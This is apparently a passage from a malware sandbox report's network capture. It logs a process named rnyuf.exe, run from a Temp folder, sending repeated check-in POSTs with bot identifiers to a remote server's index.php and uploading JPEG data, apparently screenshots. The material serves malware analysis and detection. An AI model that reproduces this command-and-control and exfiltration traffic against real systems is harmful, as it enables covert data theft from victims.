                                        Aug 29, 2021 22:27:14.367639065 CEST2420OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:14.368022919 CEST2430OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:14.368320942 CEST2433OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:14.402553082 CEST2441OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:14.402607918 CEST2444OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:14.402826071 CEST2456OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:14.402854919 CEST2459OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:14.437547922 CEST2467OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:14.437593937 CEST2496OUTData Raw: e1 0a 50 29 45 2d 32 4b 3a 7b 2c 57 d1 bb b0 55 19 c9 3f 43 5d 64 37 b7 97 1a 7b da c1 73 3c b6 48 c1 de 24 90 98 d5 8f 42 40 e0 1e 0f 3e d5 c4 9a ed be 1e fc 41 ff 00 84 13 fb 47 fe 25 7f 6e fb 6f 95 ff 00 2f 1e 56 cd 9b ff 00 d9 6c e7 7f b7 4a
                                        Data Ascii: P)E-2K:{,WU?C]d7{s<H$B@>AG%no/VlJ)j:QI/ntMb^.$N\E:x|nTc#RIUZcN1s^jay'P{l3xD!|8;RIU
                                        Aug 29, 2021 22:27:14.437736034 CEST2503OUTData Raw: 8b 23 4b 57 3f bb 91 1b e8 e0 d3 0e 93 27 a3 81 ea 56 98 10 9e d5 66 18 6e 38 d8 5d 7e 87 15 0d ce 3d 4a 8c 94 b6 45 53 a5 cd fc 3b 4f d4 e2 98 da 65 d0 ff 00 96 4c 7d c5 6f c1 0d e1 c6 66 63 ec 79 ad 6b 68 2e 4e 32 a8 df 55 ac 27 8b 94 0e da 58
                                        Data Ascii: #KW?'Vfn8]~=JES;OeL}ofcykh.N2U'XgS&3nk<=b}0`htvG'=$&MbS*:fk s4*eA~"5b)Y#sC$:Xl,|Ju6t?;5dUgO
                                        Aug 29, 2021 22:27:14.547033072 CEST2527INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:14 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        130192.168.2.44986946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:53.580914974 CEST11005OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:53.653335094 CEST11005INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:27:53.763492107 CEST11006OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:53.763601065 CEST11006OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:53.763822079 CEST11016OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:53.763953924 CEST11019OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:53.798655033 CEST11029OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:53.798711061 CEST11045OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:53.832676888 CEST11085OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:27:53.832751989 CEST11090OUTData Raw: 06 b3 d3 40 d0 fc 96 d4 de 2d 4f ec 0d a3 1d 49 2d 0d cc 6b 3a b0 9c 43 83 27 96 41 53 92 c0 ec 19 18 ac fd a5 2b 5e df d6 bf e4 ca 54 ea 3e a4 7f f0 b2 fc 63 ff 00 43 0d ef fd f4 3f c2 99 27 c4 7f 17 4b 1b 47 26 bf 78 e8 e0 ab 2b 30 20 83 d4 11
                                        Data Ascii: @-OI-k:C'AS+^T>cC?'KG&x+0 ~+a3pfk%H;(|+pOC4Om==iJo9K9>z}?9'wbX;4sd*cqUMl,N|#guUbnT_
                                        Aug 29, 2021 22:27:53.832768917 CEST11097OUTData Raw: da d3 9d 63 d1 6c dd d8 2a 2d b2 16 66 38 00 6d 1c 9a e7 9b c6 b2 5e 4e f1 e8 3a 2d d6 a8 91 9c 34 e1 bc a8 f3 ec c4 1c fe 95 53 c4 0f 2d e6 99 e1 bd 06 39 1a 34 d4 82 09 99 4f 3e 5a 2a 96 1f af e9 57 b5 dd 79 3c 2d 1d 86 95 a5 69 c2 7b 99 86 d8
                                        Data Ascii: cl*-f8m^N:-4S-94O>Z*Wy<-i{-?Q9-jw{ 5OX1|*mkF2y;4rGVuL$"[m'%pt.W9%D4VdeZj7m=>
                                        Aug 29, 2021 22:27:53.866637945 CEST11112OUTData Raw: 8a 43 1d 9a 33 4d cd 19 a0 2c 3b 34 94 dc d2 66 95 c7 61 e4 d2 66 9b 9a 4c d2 b8 ec 3b 34 66 99 9a 09 a2 e1 61 d9 a0 9a 6e 69 33 4a e3 b0 a6 8a 4c d1 9a 41 61 73 41 34 dc d2 13 45 c7 61 49 a4 cd 37 34 86 a6 e5 58 75 37 bd 19 34 94 0c 53 d6 83 46
                                        Data Ascii: C3M,;4fafL;4fani3JLAasA4EaI74Xu74SFi3H%ZAE.h5isUpi3IIHvI)JQ@i4S+OCK-4Ss<qdzh5YN(;NI?6TiJ\(|*?]SxC&/o'"ld+
                                        Aug 29, 2021 22:27:53.934263945 CEST11112INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        131192.168.2.44987046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:53.800890923 CEST11045OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:53.877295017 CEST11112INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        132192.168.2.44987146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:54.037111998 CEST11113OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:54.113221884 CEST11114INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        133192.168.2.44987346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:55.383352041 CEST11115OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:55.383481026 CEST11115OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:55.384150982 CEST11125OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:55.384790897 CEST11128OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:55.415956020 CEST11131OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:55.416003942 CEST11133OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:55.416043043 CEST11136OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:55.416064978 CEST11137OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:55.416121960 CEST11148OUTData Raw: 19 cf 51 a6 d4 97 54 2e 29 69 29 6b 53 20 a3 14 a2 92 98 84 a2 9c 28 a4 31 b4 52 d1 40 09 45 06 8a 00 4a 5c 50 68 14 86 14 51 45 3b 08 28 c5 2d 20 a0 03 14 b4 51 40 05 14 52 8a 04 25 2d 14 53 00 a2 81 47 7a 00 3b d2 d1 45 31 05 28 a4 a5 a0 02 96
                                        Data Ascii: QT.)i)kS (1R@EJ\PhQE;(- Q@R%-SGz;E1(P(((dESZQIKLL(b;)QE(@)hBK?::8RZhhIE04ihLCSE8U\A\VaSL6 jpj,$V0#]SK>yTqK+b
                                        Aug 29, 2021 22:27:55.416471004 CEST11151OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:55.416670084 CEST11153OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:55.548789024 CEST11223INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:55 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        134192.168.2.44987246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:55.386156082 CEST11128OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:55.459954977 CEST11204INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:55 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        135192.168.2.44987446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:55.649152994 CEST11224OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:55.719065905 CEST11224INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:55 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        136192.168.2.44987546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:56.133362055 CEST11225OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:56.445945978 CEST11225INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:56 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        137192.168.2.44987746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
